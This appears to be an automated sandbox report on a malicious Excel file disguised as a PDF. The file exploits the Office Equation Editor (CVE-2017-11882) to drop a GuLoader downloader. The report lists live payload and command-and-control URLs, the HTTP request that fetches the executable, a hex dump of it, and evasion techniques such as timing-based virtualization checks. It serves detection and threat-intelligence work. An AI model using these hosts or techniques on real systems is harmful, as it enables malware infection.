Loading ...

Play interactive tourEdit tour

Windows Analysis Report MTIR21487610_0062180102_20210714081247.PDF.xlsx

Overview

General Information

Sample Name:MTIR21487610_0062180102_20210714081247.PDF.xlsx
Analysis ID:449166
MD5:168c2cabea51b16aa19a152a652254f5
SHA1:477715c6a9d3219ea85a60eac9c80af83a102357
SHA256:9b88ac825c56b50955cbc6211bb563f7334c51c2e90e3d2bfebefed817b4ad90
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected GuLoader
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2652 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2184 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2520 cmdline: 'C:\Users\Public\vbc.exe' MD5: FCFB0EC70F1419EDE8A534CC95CB61E9)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://ceattire.com/bin_UYDMbHwI28.bin"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\vbc.exeJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exeJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000006.00000000.2144558034.0000000000401000.00000020.00020000.sdmpJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security
        00000006.00000002.2360258562.0000000000401000.00000020.00020000.sdmpJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security
          00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.0.vbc.exe.400000.0.unpackJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security
              6.2.vbc.exe.400000.0.unpackJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security

                Sigma Overview

                Exploits:

                barindex
                Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 180.214.239.39, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2184, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
                Sigma detected: File Dropped By EQNEDT32EXEShow sources
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2184, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe

                System Summary:

                barindex
                Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2184, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2520
                Sigma detected: Execution from Suspicious FolderShow sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2184, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2520

                Jbx Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://ceattire.com/bin_UYDMbHwI28.bin"}
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exeVirustotal: Detection: 42%Perma Link
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exeReversingLabs: Detection: 31%
                Source: C:\Users\Public\vbc.exeVirustotal: Detection: 42%Perma Link
                Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 31%
                Multi AV Scanner detection for submitted fileShow sources
                Source: MTIR21487610_0062180102_20210714081247.PDF.xlsxReversingLabs: Detection: 28%

                Exploits:

                barindex
                Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ANTISOCIA.pdb source: .svchost[1].exe.4.dr
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80
                Source: excel.exeMemory has grown: Private usage: 4MB later: 71MB

                Networking:

                barindex
                C2 URLs / IPs found in malware configurationShow sources
                Source: Malware configuration extractorURLs: http://ceattire.com/bin_UYDMbHwI28.bin
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 15 Jul 2021 09:06:43 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Tue, 13 Jul 2021 17:05:39 GMTETag: "41470-5c7043f493d18"Accept-Ranges: bytesContent-Length: 267376Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e2 ca 46 52 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 03 00 00 90 00 00 00 00 00 00 70 14 00 00 00 10 00 00 00 70 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 07 00 00 00 04 00 00 00 00 00 00 00 00 00 04 00 00 10 00 00 e6 1c 04 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 64 03 00 28 00 00 00 00 80 03 00 92 7a 00 00 00 00 00 00 00 00 00 00 58 00 04 00 18 14 00 00 00 00 00 00 00 00 00 00 20 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 59 03 00 00 10 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 d4 0b 00 00 00 70 03 00 00 10 00 00 00 70 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 92 7a 00 00 00 80 03 00 00 80 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
                Source: global trafficHTTP traffic detected: GET /cpu/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\300F3110.emfJump to behavior
                Source: global trafficHTTP traffic detected: GET /cpu/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive
                Source: .svchost[1].exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                Source: .svchost[1].exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                Source: .svchost[1].exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                Source: .svchost[1].exe.4.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                Source: .svchost[1].exe.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: .svchost[1].exe.4.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                Source: .svchost[1].exe.4.drString found in binary or memory: http://ocsp.digicert.com0C
                Source: .svchost[1].exe.4.drString found in binary or memory: http://ocsp.digicert.com0O
                Source: 300F3110.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
                Source: .svchost[1].exe.4.drString found in binary or memory: http://www.digicert.com/CPS0
                Source: .svchost[1].exe.4.drString found in binary or memory: https://www.digicert.com/CPS0

                System Summary:

                barindex
                Office equation editor drops PE fileShow sources
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exeJump to dropped file
                Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
                Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E54E7 NtAllocateVirtualMemory,
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E55AC NtAllocateVirtualMemory,
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E54E7
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E7036
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E100E
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E4071
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E80D4
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E2958
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E2940
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E29B0
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E2183
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E42CD
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E72C3
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E1B2D
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E1B1A
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E7B73
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E1B5F
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E4B8E
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E8385
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E43F1
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E341B
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E844C
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E8C82
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E8CD5
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E34C4
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E350F
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E8D58
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E7D52
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E0EFE
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E3F0C
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E7F03
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E7F6D
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E0FB5
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E2793
                Source: C:\Users\Public\vbc.exeCode function: 6_2_003E4785
                Source: MTIR21487610_0062180102_20210714081247.PDF.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe FF1B034C7060724133C6DF0AA8CF5411EC0E6775D3ACA83A127617340A8C588A
                Source: Joe Sandbox ViewDropped File: C:\Users\Public\vbc.exe FF1B034C7060724133C6DF0AA8CF5411EC0E6775D3ACA83A127617340A8C588A
                Source: .svchost[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: .svchost[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: .svchost[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@4/11@0/1
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$MTIR21487610_0062180102_20210714081247.PDF.xlsxJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE205.tmpJump to behavior
                Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: MTIR21487610_0062180102_20210714081247.PDF.xlsxReversingLabs: Detection: 28%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                Source: MTIR21487610_0062180102_20210714081247.PDF.xlsxStatic file information: File size 1268792 > 1048576
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ANTISOCIA.pdb source: .svchost[1].exe.4.dr
                Source: MTIR21487610_0062180102_20210714081247.PDF.xlsxInitial sample: OLE indicators vbamacros = False
                Source: MTIR21487610_0062180102_20210714081247.PDF.xlsxInitial sample: OLE indicators encrypted = True

                Data Obfuscation:

                barindex
                Yara detected GuLoaderShow sources
                Source: Yara matchFile source: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
                Yara detected GuLoaderShow sources
                Source: Yara matchFile source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000000.2144558034.0000000000401000.00000020.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2360258562.0000000000401000.00000020.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: C:\Users\Public\vbc.exe, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe, type: DROPPED
                Source: C:\Users\Public\vbc.exeCode function: 6_2_0040495E push es; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00221774 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00221023 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00222823 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00224023 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00227024 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00225825 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00224833 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00223033 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00221833 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00226034 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00220038 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00224803 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00223003 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00221803 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00226004 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00220008 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00223813 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00225013 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00222014 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00226814 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00220818 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00223063 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00221863 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00224863 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00226065 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00220068 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00222074 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00223874 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00225074 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00226875 push edx; ret
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

                Boot Survival:

                barindex
                Drops PE files to the user root directoryShow sources
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
